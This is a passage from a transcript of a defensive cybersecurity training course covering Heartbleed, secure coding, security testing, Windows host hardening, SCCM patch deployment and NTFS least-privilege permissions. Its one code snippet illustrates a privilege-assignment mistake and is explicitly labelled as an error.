However, the problem with the way that OpenSSL was coded and it's since been fixed, is that it lacked checks
between client-specified payload value in terms of bytes and what the actual size that was transmitted was.
Now, because this wasn't checked properly on the server side, then it resulted in the client being able to read
server memory contents beyond what was allocated for the variable containing the client data.
So essentially, an attacker could cause the server to read and return the contents of memory beyond the end of
the submitted packet data. And that, of course, violates secure coding practices. With secure coding, best
practices and recommendations will vary from programming language to programming language. So, if we're
scripting using a Unix or a Linux shell of some type or using Visual Basic or Microsoft PowerShell or
languages like C, C++, Java, and Python. There will be different best practices and recommendations although
there are some common threats. [The Secure Coding Cheat Sheet web page of www.owasp.org web site is
open. The web page is divided into two sections. The first section contains the navigation pane. The navigation
pane includes links such as Home, Books, and News. By default, the Home link is selected. The second section
includes the Page and Discussion tabs. By default, the Page tabbed page is open. The content of the Home link
is displayed in the second section. The second section includes links such as the Introduction, Session
Management, Input Data Validation, and Cryptography.] Consider, for example, the OWASP Secure Coding
Cheat Sheet on the screen listed now. In the overview or table of contents, we can see the categories related to
secure coding. For example, for User Authentication, Session Management, Input Data Validation. Let's go
ahead and click on that.
[He clicks the Input Data Validation link and its web page opens. This web page includes URLs such as
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet and
http://www.owasp.org/index.php/Logging_Cheat_Sheet. He clicks the
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet URL.] Here, we can click the link to read
about Input Data Validation as it relates to secure coding. [The Input Validation Cheat Sheet web page opens
in the www.owasp.org web site.] Now remember, it's going to vary whether you're using Python or C++ or
Java to write your code. But now that we're in the input validation documentation, we can start to go down and
read a little bit about the detail related to that. For example, with Java whether we're using server-side or
client-side code and so on. [He resumes the explanation of the secure coding. He is referring to the following
lines of code: $admin_privilege=$true, try, {, custom_function arg1 arg2, if ($condition -eq "Value"), {,
$admin_privilege=$true, }, }, catch. Code ends.] As a simple example, consider the code on the screen, where
an admin_privileges variable is being set to a value of true. Then we've got a try-catch block which captures
runtime problems or errors. And here, we're running a custom function and giving it some arguments. But then
there's an if statement testing a condition. And essentially it is setting the admin_privileges variable again to
being true.
Now the problem with the coding here is that the admin_privilege variable outside of the try-catch error loop
structure is setting the admin_privilege to true. So we don't want to give privileges unless, certain, very
specific certain conditions are met in a proper fashion. This type of obvious error would be quickly picked up
more likely than not with another set of eyes through peer review. In this video, we discussed secure coding.
In this video, you will learn how to properly test technology solutions for security.
Objectives
[Topic title: Security testing. The presenter is Dan Lachance.] In this video, I'll talk about security testing.
Security testing might be required by law or for regulatory compliance. In some cases, we might need to go
through third-party businesses to make sure that we have proper security testing in place to secure contracts.
Then, of course, we might have to pass audits or achieve some kind of accreditation such as PCI-DSS. Now
the PCI-DSS standard applies to organizations that work with card-holder data – such as credit and debit cards
to make sure that that data is protected properly.
Fuzzing means that we are feeding abnormal data to an application and we want to observe its results. So, for
instance, we might pass a number to a string variable, we might read beyond required memory to store a value
as was the problem related to the Heartbleed bug, or we might make sure that applications don't crash through
denial of service attacks. Many tools can be used to execute multiple fuzz tests against the target. So it could
be manual. But often, it's done in an automated fashion using a tool designed specifically for fuzz testing. Now
fuzz testing must be done from the perspective of a malicious user or a security tester just testing an
application.
A web application vulnerability scan is another way to test the security of an application. Now, again, this can
be manual or automated. There are tools such as Nexpose, Nikto, or Qualys-related tools that will do this type
of web app vulnerability scan for us that will check for things like standard misconfigurations or the allowing
of directory traversals through the web app file system. It'll check for the possibility of SQL injection attacks
due to improper field validation on web forms and also things like remote command execution.
A static code analysis is another part of security testing for an app which is often called white box testing. This
will apply to both compiled as well as noncompiled code. It tests applications' inputs as well as the outputs
depending on what was fed into the app. It's used to detect flaws, including things like backdoors. Backdoors
allow a malicious user into the application with escalated privileges without the system owners' knowledge. A
regression analysis can also be conducted. It's also considered to be a predictive analysis where we look at the
varying relationships between different application components. Sometimes, when you do security testing on
one component of an application, it appears to be solid. But, when we look at the interaction, we add more
moving parts, then we might realize that there is some kind of a security vulnerability.
So sometimes we might, for instance, have multiple code variables with differing values when that variable is
passed to a different application component. An interception proxy can also be used as part of security testing.
This is also called an inline proxy. It's used to crawl a web application, in other words, to pour over it looking
for weaknesses. The interception proxy also has the ability to capture and replay web-specific traffic for an
application where parameter values can be modified. So this is really akin to a man-in-the-middle attack, but
it's part of testing. We have to account for the fact that there are malicious users that will perhaps attempt these
types of attacks. And we have to think in the same way.
Interception proxies, however, are invisible to client web browsers. Now an example of an interception proxy
is the OWASP Zed Attack Proxy. [The OWASP Zed Attack Proxy Project web page is open in the
www.owasp.org web site. The web page is divided into two sections. The first section contains the navigation
pane. The navigation pane includes links such as the Home, Chapters, and News. By default, the Home link is
selected. The second section includes the Page and Discussion tabs. By default, the Page tab is open. The
Page tabbed page includes the Main, News, and Talks tabs. By default, the Main tabbed page is open. The
Main tabbed page includes the Download ZAP button, Download OWASP ZAP! link, and zap-extensions
link.] So, if you search up OWASP and Zed Attack Proxy, which I've done here, it's pretty easy to find the
web page that explains what the purpose of this is. Its purpose is to help find security vulnerabilities in web
applications. And really, this is a tool that we could use at various phases of the system development life cycle.
So there are plenty of tools that are available to automate security testing also in the form of interception
proxies, as seen here. [Dan resumes the explanation of security testing.] Despite our best technical efforts to
secure an application...and it's very important that we do this, in the end, user acceptance testing is what really
solidifies our solution as being usable. Does the solution behavior align with design requirements, and are user
needs addressed with our solution?
So we might identify problems that were missed during testing. And this might be brought about by end-user
testing. Maybe, for example, we've got a calculation feature in a web app that does work but is unacceptably
slow. We also have to think about regulatory and contractual compliance to make sure that the solution aligns
with those. In this video, we talked about security testing.
[Topic title: Host Hardening. The presenter is Dan Lachance.] In this video, I'll demonstrate how to harden a
Windows host to reduce the attack surface. The first thing that we should keep in mind is that reducing the
attack surface, really, means only keep things running that are absolutely required on that host operating
system. Now at the same time, we need to make sure software updates have been applied. [The Start page is
open. The page includes a search bar. Dan types update Services in the search bar. Then the links such as the
Windows Server Update services and the Windows Update link appear.] So here in my Windows Server, I'm
going to go to my Start menu and type in the word "update" and I'm going to choose Windows Update. [The
Windows Update page opens. The page is divided into two sections. The first section includes clickable
options such as the Check for update, Change settings, and View update history. The second section includes
the Download and install updates section. The Download and install updates section includes the Install
updates button.] On this particular host, we notice that we have the option to download and install updates in
the amount of 945 megabytes. So clearly, this machine is not fully up to date. However, I can see down below
when it most recently checked for updates. So today at 10:22 a.m. And I can see when updates were last
installed.
At the same time on the left, I can also View update history. [He clicks the View update history link and View
update history page opens. A table is displayed on this page. This table has four columns and several rows.
The column headers are Name, Status, Importance, and Date installed.] So I can see the individual updates
and whether or not the Status is Succeeded, the Importance of the update, and when it was installed. But how
do you deal with that on a large scale in an enterprise? For instance, if you're a datacenter administrator, how
do you make sure that your hypervisor hosts have all the updates? Surely, there's a better way than going to
each and every one and doing it manually. And of course, we can do that. [He opens the System Center
Configuration Manager from the task bar.] We're going to do that by using the SCCM management tool.
System Center Configuration Manager is a suite or is a product that is available from the System Center suite
available from Microsoft.
[The System Center Configuration Manager window is divided into two sections. The first section includes two
subsections. The second subsection includes the Assets and Compliance and Software Library tabs. The
Software Library tab is selected by default. The first subsection is the navigation pane. The navigation pane
includes the Overview root node. The Overview root node is selected. Under the Overview root node, the
Software Updates node is selected. Under the Software Updates node, the Software Update Groups folder is
selected. The second section includes a search bar and a table. The table contains nine columns and two rows.
The column headers are Icon, Name, Description, Date Created, Last Date Modified, Percent Compliant,
Created By, Deployed, and Downloaded. In the second row, the entry under the column header Name is Win 7
Required Updates, the entry under the column header Date Created is 4/7/2016 11:19 AM, the entry under the
column header Last Date Modified is 4/7/2016 11:19 AM, the entry under the column header Percent
Compliant is 33, the entry under the column header Deployed is Yes, and the entry under the column header
Downloaded is Yes.] Now here, I've gone into the Software Library workspace in the bottom-left. And over in
the left-hand navigator, under Software Updates, I'm going to click All Software Updates. [The All Software
Updates includes a table. The table includes eight columns and several rows. The column headers are Icon,
Title, Bulletin ID, Required, Installed, Percent Compliant, Downloaded, and Deployed. One row is
highlighted. In this row, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 100, the entry under the column header
Downloaded is Yes, the entry under the column header Deployed is Yes.] So what SCCM can do is it can
synchronize software update metadata, even from Microsoft Online, which it's done here. And we're looking at
the metadata here. And then from here, I can work with it and get it deployed internally. Ideally, a single
configuration could deploy required updates to potentially thousands of computers. So I don't have to visit
each of those computers for update purposes. So when I'm looking at an update here, [He is referring to a row
whose entry under the column header Title is Critical Update for Office 2003, the entry under the column
header Required is 0, the entry under the column header Installed is 0, the entry under the column header
percent compliant is 100, the entry under the column header is Downloaded is No, and the entry under the
Deployed column header is No. He right-clicks on this row and a flyout appears. The flyout includes options
such as Download, Deploy, and Move.] I could right-click on it and actually Download the binary files for it.
Because again, the only thing you're seeing here when you're looking at updates is the metadata. It's not the
actual files that comprise the update, they need to be downloaded. And we can see that option here when we
right-click on a single update.
Now we also have the option of Deploying the update to a device collections. [He clicks the Deploy option
and the Deploy Software Updates Wizard opens. This is divided into two sections. The first section includes
the General, Deployment Settings, and Alerts links. By default, the General link is selected. The second section
includes the Deployment Name text box, Collection text box, and Browse button. At the bottom right-hand
side, there are Next and Cancel buttons.] Down here at the bottom, I'll click the Browse button. [The Select
Collection dialog box opens. This dialog box is divided into two sections. The first section includes a drop-
down list and a navigation pane. The navigation pane includes the Root node. The Root node includes the
Toronto Collections subnode. The second section includes a search bar. At the bottom right-hand side, there
are OK and Cancel buttons. ] And I have the ability of selecting a collection, which is, really, just a group of
computers that I could have customized to deploy the updates to. [He clicks the Cancel button and switches
back to the Deploy software updates wizard. He clicks the Cancel button and the Configuration Manager
dialog box opens. This dialog box includes the Yes button and the No button. He clicks the Yes button and
switches back to the System Center Configuration Manager.] However, because updates are numerous, we
probably don't want to do that for individual updates like I've just demonstrated. Instead, for instance, you can
use Ctrl+click to select numerous updates. You could also search for updates here, up in the bar at the top.
Either way, when you've got multiple updates selected, you can right-click on them and Create Software
Update Group. [He has selected various rows in the table and right-clicks on one of the selected rows and then
a flyout appears. He highlights the Create Software Update Group option.] So they're grouped together in one
lump, instead of dealing with each individual update. Because, for instance, with Windows Server 2012 R2,
you know, on patch Tuesday, the second Tuesday of each month when Microsoft releases most of the updates,
you could have hundreds of updates. You probably want to group them into a Software Update Groups.
[He selects the Software Update Groups view present under the Software Updates folder.] Now I've already
got some created. So let's click on that Software Update Groups view on the left. And what I would do on the
right is right-click on the Software Update Group, Download the actual update files, and then Deploy to a
collection. So that way, we're doing it on a larger scale. But there's more than just deploying updates to harden
the system. [He minimizes the screen and switches back to the View update history screen.] What about
disabling unneeded services? Let's close down some of these screens, and let's go ahead and open up our list of
services here in Windows. [He opens the Services window. The screen is divided into two sections. The first
section includes the navigation pane. The second section includes a table with five columns and several rows.
The column headers are Name, Description, Status, Startup Type, and Log On As. He double-clicks the row
whose entry under the column header Name is BranchCache.] Here I've selected the BranchCache service for
my example. Let's say we know we don't need the BranchCache feature, so I'm going to go ahead and double-
click. [The BranchCache Properties dialog box opens. It includes the General and Log On tabs. By default,
the General tabbed page is open. It includes the Startup type drop-down list, OK button, Apply button, and
Cancel button.] Here the Startup Type has been set to Automatic. Now you have to be careful with this. You
have to do a bit of research and testing to ensure that there are no dependencies even from other services for
this service to be running.
So it requires a bit of homework ahead of time. But once you're sure it doesn't need to be running, you might
change its Startup type. For example, here I might change it to Manual or completely Disabled. Now, if I were
to do that, for instance, set the Startup type to Manual, [He selects the Manual drop-down option in the Startup
type drop-down list.] I could Apply the change. But notice that the Service would still be Running, so I could
also Stop it. So it's important whether we're using a Windows or Linux or UNIX operating system that we take
a look at the services or in Linux – the daemons that are running and determining which one should be
disabled. And in the UNIX and Linux world you're really disabling it for given run levels in many
distributions. [He clicks the Cancel button.]
Now aside from that there are other things that we should bear in mind too. [He closes the Services
window.] Here on my Windows Server, I can go ahead and open up my Local Group Policy Editor. [The
Local Group Policy Editor is divided into two sections. The first section is the navigation pane and the second
section is the content pane. The content pane includes a table with two columns and several rows. The column
headers are the Policy and the Security Setting.] Now in an Active Directory environment, you can configure
Group Policy Objects or GPOs, which could be applied to potentially thousands of computers that are joined to
your Active Directory domain. But here, I'm just going to configure my Local Group Policy. Either way, we've
got thousands of settings here that we could use to harden a host. So in the left-hand navigator in my Local
Computer Policy, you can see clearly, I've already gone under Computer Configuration - Windows Settings -
Security Settings. And, for instance, here under Local Policies, I have numerous security options that I could
apply to this server.
I've got Account Policies where I could configure the Password Policy – things like password reset settings,
minimum and maximum password age, and so on. Of course, every device on a network, whether it's a server
or a smartphone should have a host-based firewall. [He clicks the Windows Firewall with Advanced Security -
Lock firewall. The content pane includes the Overview section and the Getting Started section.] So I could
configure the inbound and outbound firewall rules on this server in this manner. [The Windows Firewall with
Advanced Security - Lock firewall includes the Inbound Rules and the Outbound Rules firewall. He clicks the
Inbound Rules firewall and then clicks the Outbound Rules firewall.] Of course, there are other ways to do it
including at the command line. I could also configure things like Software Restriction Policies – or the newer –
in the case of Windows, Application Control Policies to determine exactly which processes are allowed to run
on this particular host.
[He resumes from the desktop screen.] Of course, another aspect of hardening operating systems is to ensure
you have some kind of up-to-date and reliable antimalware scanner. Here, in my server, I'm going to search for
endpoint. [The start page opens and he types the endpoint protection in the search bar.] Here I'm using
System Center Endpoint Protection but really any antimalware solutions generally have the same configuration
settings. [He clicks the System Center Endpoint Protection link and the System Center Endpoint Protection
dialog box opens. The dialog box includes the Home tab, Update tab, and History tab. By default, the Home
tabbed page is open. There is a Scan options section on the right side. The Scan options includes the Quick
radio button, Full radio button, Custom radio button, and Scan now button. It includes the Quick radio button,
Custom radio button, and Scan now button.] So whether or not Real-time protection is enabled...here it's
Disabled on this server. But really it should be enabled. Notice that the Virus and spyware definitions here are
Up to date. Of course, if I go to the Update tab, I can see when that occurred. [The Update tabbed page
includes the information about the Definitions created on, the Definitions last update, and the Update
definitions button.] I can also get a list of History for quarantined or removed items. [He clicks the History
tab. The history tabbed page includes the Quarantined items and Allowed items radio buttons.] And I also
have numerous Settings. [He clicks the Settings tab. The Settings tabbed page includes two sections. The first
section includes the Scheduled scan, Default actions, and MAPS options. The second section includes the Scan
type drop-down list and the Cancel button.] Now notice a lot of them are grayed out. That's because it can be
centrally controlled.
[He maximizes the System Center Configuration Manager present in the task bar.] In this case, that's done
using SCCM. That would be under the Assets and Compliance workspace in the bottom left, where under my
left-hand navigator, I could expand Endpoint Protection. [He expands the Endpoint Protection folder. It
contains the Antimalware Policies and the Windows Firewall Policies. He clicks the Antimalware Policies.
The content pane includes a table with six columns and two rows. The column headers are Icon, Name, Type,
Order, Deployments, and Description. He clicks the row whose entry under the column header Name is
Default Client antimalware policy, the entry under the column header Type is Default, the entry under the
column header Order is 10000, and the entry under the column header Deployments is 0. Then the Default
Antimalware Policy dialog box opens. It is divided into two sections. The first section is the navigation pane
and it includes the Scheduled scans, scan settings, and Default actions options. The second section is the
content pane. It includes the Scan type drop-down list and the Scan time drop-down list. At the bottom right-
hand side of the Default Antimalware Policy dialog box are the OK and Cancel buttons.] And I could
configure Antimalware Policies that would be applied to my managed stations that are being managed by
SCCM. Now, of course, you've got numerous other things you should be doing to make sure hardening is
effective like periodic penetration testing and so on. In this video, we discussed ways of hardening a host to
reduce the attack surface.
Upon completion of this video, you will be able to recognize the importance of keeping hardware and software
up to date.
Objectives
[Topic title: Patching Overview. The presenter is Dan Lachance.] In life, nothing is perfect and that includes
firmware and software. One great countermeasure is to make sure these things are patched periodically.
Vulnerabilities get discovered over time with both firmware code and software. Patching can fix security and
stability problems discovered. When we decide that we're going to deploy patches especially on a larger scale,
we need a way to monitor that patch deployment to ensure it succeeded. We also should have an enterprise-
class solution that allows us to monitor for patch compliance so that at any given moment, we can run a report
to see which devices on the network do not comply with the latest patches and therefore present a security risk.
Many modern solutions also allow us to inject patches to operating system images. So, for example, we might
have a Windows 10 standard corporate image that we deploy to new desktops. But, if that image was built a
year ago, generally speaking, it's a year out of date with patches. So there are solutions such as Microsoft
System Center Configuration Manager, among others, that allow us to inject patches into the image itself even
without it being deployed. The benefit here is that when we deploy that image, it's up to date with the latest
patches.
[The System Center Configuration Manager window opens. The window is divided into two sections. The first
section is divided into two subsections. The second subsection includes the Software Library and Monitoring
tab. The first subsection is the navigation. In the navigation pane, the Overview root node is selected. Under
the Overview root node, the Operating systems node is open. Under the Operating Systems node, the
Operating Systems Images subnode is open. The second section includes a search bar and a table. The table
contains information about Windows 7 ENTERPRISEN.] For example, here in Microsoft System Center
Configuration Manager, I've got a Windows 7 ENTERPRISEN image. And, if I were to right-click on it, [A
flyout opens. The flyout includes options such as Schedule Updates, Refresh, and Delete.] I have the option to
Schedule Updates. [Dan clicks the Schedule Updates option and the Schedule Updates Wizard opens. The
Wizard is divided into two sections. The first section includes the Choose Updates, Set Schedule, and Summary
links. By default, the Choose Updates is selected. The second section includes the Select or unselect all
software updates in this list checkbox, the System architecture drop-down list, and a search bar. At the bottom
right-hand side of the Schedule Updates Wizard are the Next button, Summary, and Cancel buttons.] Now
when that dialog box opens up, the first page of the wizard gives me a list of related updates. In this case, for
Windows 7. And I can select or deselect the appropriate updates. Now when I click the Next button at the
bottom, I can then schedule when I want these injected into that image. [He clicks the Next button and the Set
Schedule page opens. It includes the As soon as possible radio button, the Continue on error checkbox, the
Update distribution points with the image checkbox, and the Next button. By default, the as soon as possible
radio button, the Continue on error checkbox, and the Update distribution points with the image checkbox are
selected.] So the beauty here is that when I deploy that Windows 7 ENTERPRISEN image in this specific
example, it will be up to date.
[He resumes the explanation of patching overview.] As mentioned, patching also deals with firmware updates.
So, at the hardware level, that includes things like BIOS updates on motherboards, wireless router firmware
updates to close security holes, printer firmware updates, router firmware updates, switches, mobile devices –
like smartphones, and Internet of Things or IoT firmware updates. These days IoT is used for a lot of consumer
devices like home video surveillance systems and the remote capability to control heating and lights and so on.
All of these types of firmware need to have the latest patches applied to make sure they work correctly, support
enhanced features, and, of course, close any known security vulnerabilities.
At the software level, of course, patching will apply fixes to operating systems, drivers, applications running
within the operating systems, or even mobile devices and the apps running on them. Pictured on the screen, we
see a screenshot of Windows Server Update Services or WSUS. [Running along the top of the Update Services
window is the menu bar. It includes menus such as the File, Action, and Window. The rest of the screen is
divided into two sections. The first section includes the navigation pane. In the second section, the Approved
Updates dialog box is open.] Now unlike SCCM, WSUS is available for free from Microsoft with their server
products. And what we see pictured here is a number of approved updates being applied for a group. We can
see in the left part of the diagram, we've got a Halifax_Computers group as well as an Update_Testing group.
These are groups of computers that we can target approved updates to. This way we know exactly which
devices are receiving which patches.
[He resumes the explanation of the patching overview.] Patching should also include deadlines whereby we
provide a notification to the user that a deadline is approaching and the patches will apply – regardless of what
the user selects. However, when we apply patches, this can slow down the computer and the network. And the
last thing we really want to do is hamper user productivity. But, at the same time, we must adhere to
organizational security standards for patching and security. So what we might do is configure maintenance
windows. A maintenance window is supported by various products and it's usually after hours where
maintenance is allowed, such as the application of software updates. The idea with the maintenance window is
to minimize the disruption to the end user. We can also configure the reboot behavior. So for example, if a user
is using their laptop to present something in a boardroom, we don't want their computer rebooting in the
middle of their presentation.
So, of course, there are many ways to get around that, including making sure that we use maintenance
windows after hours. And also, there are some software tools that can run in presentation mode that will ignore
any things like patch reboot requirements and so on until our presentation is complete. License agreements
apply to some software updates. This might be automated or the end user might have to interact with the
installation of an update to accept our license agreement.
In this video, learn how to apply patches properly to secure network hosts.
Objectives
[Topic title: Use SCCM to Deploy Patches. The presenter is Dan Lachance. Dan resumes from the System
Center Configuration Manager, and the Software Updates folder is open.] In this video, I'm going to
demonstrate how to use System Center Configuration Manager to deploy patches. We all know that one
important part of hardening hosts is to apply operating system and application software updates. Microsoft
SCCM or System Center Configuration Manager has a built-in way to centrally deploy updates and also run
reports to make sure that they were deployed successfully. In the SCCM management console on the left, I've
already gone under the Software Library workspace in the bottom left. And on the left, in the navigator, I've
gone under Software Updates.
Now it's already been configured to synchronize Software Updates metadata with Microsoft Online. So now
that I've done that, I'm going to click on All Software Updates on the left, which shows me many software
updates. [The Software Updates folder includes the All Software Updates and the Software Update Groups
options. Then, in the content pane, information about many software updates is displayed in a table with eight
columns and several rows. The column headers are Icon, Title, Bulletin ID, Required, Installed, Percent
Compliant, Downloaded, and Deployed.] Actually, specifically the metadata on the right-hand side. So we've
got for Office 2003, some .NET Framework updates and as I go down through the list, we've got numerous,
numerous, numerous updates. Now of course, if you're going to be working with deploying updates centrally
in some kind of management tool, you want to make sure that you're only synchronizing updates for software
that you use. Now SCCM specifically onto itself by default, only allows you to deploy updates for Microsoft
products. If you need to deploy updates for other products, like Symantec or McAfee or Adobe and so on, then
either use some other tool outside of Microsoft or you can use the Microsoft System Center Update Publisher
tool, which you have to download and configure.
Anyway, here in All Software Updates, I could right-click an individual update that I want deployed to a
machine or machines. [He right-clicks the row whose entry under the column header Title is Update for
Microsoft Outlook 2010, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 0, the entry under the column header
Downloaded is No, and the entry under the column header Deployed is No. Then a flyout appears and it
includes the Download, Deploy, and Move options.] I could Download the binary files for that update because,
again, all we're looking at here is the metadata for the updates. And then I could deploy it by clicking
Deploy [The Deploy Software Updates Wizard opens. It is divided into two sections. The first section is the
navigation pane. The navigation pane includes links such as General, Deployment Settings, and Alerts. By
default, the General link is selected. The second section includes the Browse button and the Deployment Name
text box. At the bottom right-hand side of the Deploy Software Updates Wizard are the Cancel and Next
buttons.] and then specifying a device collection. [He clicks the Browse button and the Select Collection
window opens. The window is divided into two sections. The first section includes a drop-down list and the
navigation pane. The second section includes a search bar.] So you can't deploy updates to collections of
users. In SCCM, a collection is like a group. So you could have groups of computers that mirror departments,
the type of operating system, or the fact that they're laptops, or even geographical locations – it doesn't matter.
But once your collections are built, then it facilitates deploying things to them. In this case, software
updates. [He clicks the Cancel button and resumes from the Deploy Software Updates Wizard.]
Now instead of deploying individual updates normally, [He clicks the Cancel button and then the
Configuration Manager dialog box opens. He clicks the Yes button and the dialog box closes. He switches
back to the System Center Configuration Manager.] what one would do with this tool is select numerous
updates and put them in a software update group and manage the group of updates as an entity instead of the
individuals. So what I could do here is manually go through the list and, for example, Ctrl+click to select
multiple updates or over in the upper right, I could click Add Criteria and I could search for update metadata
that meet certain conditions. [He clicks the Add Criteria drop-down list. It includes Product, Total, and Type
drop-down options and the Add and Cancel buttons.] So maybe, what I'll do here is I'll search for things like
Product. I'll click Add. Now here, it's already got the product it's searching for – Active Directory Rights
Management Services Client 2.0 – that's not what I want. I'll go ahead and click on that link. [He clicks the
Active Directory Rights Management Services Client 2.0 link and a drop-down list appears. It includes the
Windows 7 and the Windows 8 drop-down options.] And maybe here, I'm just going to scroll all the way down
and I'm going to choose, for instance, Windows 7 assuming that's what I'm using in my environment. Then I'll
go ahead and click Search.
Now of course, I could add multiple criteria here to look for specific Windows 7 settings. But, in this case, I've
got all my Windows 7 settings listed in my search results. So what I would do at this point is, for example,
click in the list and press Ctrl+A to select them all. And here, I'm going to right-click and choose Create
Software Update Group called Win 7 Updates - All. [He selects the Create software update group option from
the flyout. Then the Create Software Update Group dialog box opens. It includes the Name text box, the
Description text box, the Create button, and the Cancel button.] And I'll Create that update group. [He types
Win 7 Updates - All in the Name text box and then clicks the Create button.] So it's always easier to manage
things on a larger scale in groups rather than individually. Now that's going to show up under the Software
Updates Group which I'll click on the left. So we can see on the right here now that we've got our Win 7
Updates - All software update group. So from here, I would right-click and Download all of the files and then I
would Deploy it to a device collection. Now that will take time depending on how many updates are involved
in the update group and what your internet connection speed is like.
But once that's been done, under the Monitoring tab, down in the bottom left, and then in the Reporting area,
on the left in the navigator, I could expand reports. Here, I've got numerous report categories that I could work
with to see if software updates have been applied correctly. So notice all the Software Updates categories of
Reports, such as Software Updates – C Deployment States. So I could click on that and here I have numerous
reports I could run. [The content pane includes various reports such as the States 1 - Enforcement states for a
deployment and the States 2 - Evaluation states for a deployment.] Now running the report, of course, simply
means right-clicking and choosing Run. [He right-clicks the States 2 - Evaluation states for a deployment
option. Then a flyout appears and selects the Run option. Then the States 2 - Evaluation states for a
deployment window opens.] And, in some cases, some reports will have parameters that you must specify, like
date ranges or collections. But either way, this is a nice centralized way on a larger scale to deploy and manage
and monitor updates. In this video, we learned how we can use SCCM to deploy patches.
During this video, you will learn how to set the correct access to file systems while following the principle of
least privilege.
Objectives
set the correct access to file systems while adhering to the principle of least privilege
[Topic title: File System Permissions. The presenter is Dan Lachance. The Active Directory Users and
Computers window is open. Running along the top is the menu bar. It includes the File, Action, and Help
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The Active
Directory Users and Computers is the root node, which includes the Saved Queries folder and the
fakedomain.local node. The fakedomain.local node includes Builtin, Computers, Users, and Managed Services
Accounts folders. By default, the Users folder is selected. The second section of the screen is the content pane.
It contains a table with three columns and several rows. The column headers are Name, Type, and
Description. By default, the row whose entry under the column header Name is Help Desk and the entry under
the column header Type is Security Group is highlighted.] In this video, I'll demonstrate how to set NTFS file
permissions on a Windows Server. Whenever we assign permissions to any type of network resource, we need
to make sure that we're adhering to the principle of least privilege and what that means is that we're only
granting enough privileges for a task to be completed and nothing more. So in the Windows world, for
instance, the last thing we want to do when someone needs basic file system access is to add them to an
administrators group. That's way too much power. Here in Active Directory Users and Computers, we've got a
user called HelpDesk User1. And, if we open up the Help Desk by double-clicking and go to the Members tab,
we can see that that user is a member of the Help Desk group. [Dan double-clicks the row with the entry Help
desk, and the Help Desk Properties dialog box opens. The Help Desk Properties dialog box includes the
General tab, the Members tab, and the Managed By tab. He clicks the Members tab. The Members tabbed
page includes the Add, Remove, and OK buttons. He clicks the OK button and the Help Desk Properties dialog
box closes.]
[The Data (I:) window opens. Running along the top is the menu bar. It includes the File, Share, and View
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The
navigation pane includes the Favorites, This PC, and Network nodes. The Favorite node includes the Desktop
and the Downloads subnodes. The This PC node includes the Desktop, Data (I:), and Videos subnodes. By
default, the Data (I:) subnode is selected. The second section contains the content pane. It includes the
Program Files folder and the UserDataFiles folder.] So let's go over to the file system where on Data (I:) –
my data drive on my server – I've got a folder called UserDataFiles. The goal here is to ensure that the Help
Desk group has the ability to create folders under UserDataFiles. But what we don't want is the Help Desk
group having the ability to modify user files. So to make that happen, we begin by right-clicking on the
UserDataFiles folder and going into Properties. [The UserDataFiles Properties dialog box opens. It includes
the General, Security, and Sharing tabs.] For NTFS security, we have to go onto the Security tab, so I'll click
on that. [The Security tabbed page opens in the UserDataFiles Properties dialog box. It includes the
Permissions for CREATOR OWNER drop-down list, Edit button, and Advanced button. At the bottom right-
hand side of the UserDataFiles Properties dialog box are the Ok and Cancel buttons. The Permissions for
CREATOR OWNER drop-down list includes the Full control, Modify, Special Permissions, and Read drop-
down options.] Now there are some precanned NTFS permissions as you see here on the left like Full control,
Modify, Read & execute, and so on. But, if you look through the list, there is nothing here about creating
folders.
So that's considered a Special permission. It's a little more granular. So I'm not going to click the Edit button
because I want to add more specific permissions otherwise called Special permissions. For that, I'll click on the
Advanced button [He clicks the Advanced button and the Advanced Security Settings for UserDataFiles dialog
box opens. It includes the Permissions, Auditing, and Effective Access tabs. By default, the Permissions tabbed
page is open. The Permissions tabbed page includes the Add, OK, and Cancel buttons.] and from here, I'm
going to click Add. [The Permissions Entry for UserDataFiles dialog box opens. It includes the Select a
principal link, the Type drop-down list, the Applies to drop-down list, the Basic permissions section, and the
Cancel button.] I'll then click on the Select a principal link [The Select User, Computer, Service Account, or
Group dialog box opens. It includes the Enter the object name to select text box, the Advanced button, the
Check Names button, and the OK button.] and I want to add the Help Desk group. [He enters the name help
desk in the Enter the object name to select text box and clicks the Check Names button.] So I'll go ahead and
type that in and check the name, looks good. I'll click OK. [The Select User, Computer, Service Account, or
Group dialog box closes and the Permission Entry for UserDataFiles dialog box appears on the screen.] So
my Help Desk group can either be Allow or Deny access to this part of the file system. [He clicks the Type
drop-down list. It includes the Allow and the Deny drop-down options.] Well, we want to Allow it in our
scenario. I want to make sure that they are allowed with the permissions that we will set to the folder itself as
well as subfolders and files within it, whether they exist now or they will exist later because permissions in the
file system get inherited by default. [He clicks the Applies to drop-down list. It includes the This folder only
and the This folder, subfolders and files drop-down options.]
Now notice that when you add an entry to an ACL – so here, the entry is the Help Desk group that they get
Read & execute, List folder contents, and Read permissions by default. [The Basic permissions section
includes the Read & execute checkbox, the List folder contents checkbox, the Read checkbox, and the Show
advanced permissions link. These checkboxes are selected.] That's not enough because we need the Help Desk
group to be able to create folders. For that over on the far right, I'm going to have to click the Show advanced
permissions link. Now you'll notice that one of the permissions that is available is Create folders / append data.
So I'm going to turn that one on and that's it. I'm going to click OK. [The Permission Entry for UserDataFiles
dialog box closes.] And I'll click OK [He clicks the OK button in the Advanced Security Settings for
UserDataFiles dialog box. Then this dialog box closes.] and OK again. [He clicks the OK button in the
UserDataFiles Properties dialog box. Then it closes and the Data (I:) window is displayed.] Now that puts us
back in Windows Explorer. Now that we've applied those changes, let's actually go back and double check our
work. We can do that by right-clicking on the folder and going into Properties. [He right-clicks the
UserDataFiles folder and clicks the Properties option from the flyout.] Then again, clicking on the Security
tab, again clicking the Advanced button, but this time we're going to click the Effective Access tab, where
we're going to Select a user that's in that group. [The Effective Access tabbed page includes the Select a user
link, the select a device link, and the View effective access button. At the bottom right-hand side of the
Advanced Security settings for UserDataFiles dialog box are the OK and Cancel buttons. He clicks the Select
a user link and the Select User, Computer, Service Account, or Group dialog box opens. He types help in the
Enter the object name to select text box and clicks the Check Names button. Then the Multiple Names Found
dialog box opens. It includes the OK and Cancel buttons.]
Now we know that HelpDesk User1 was a member of that group. So we're going to select them and click
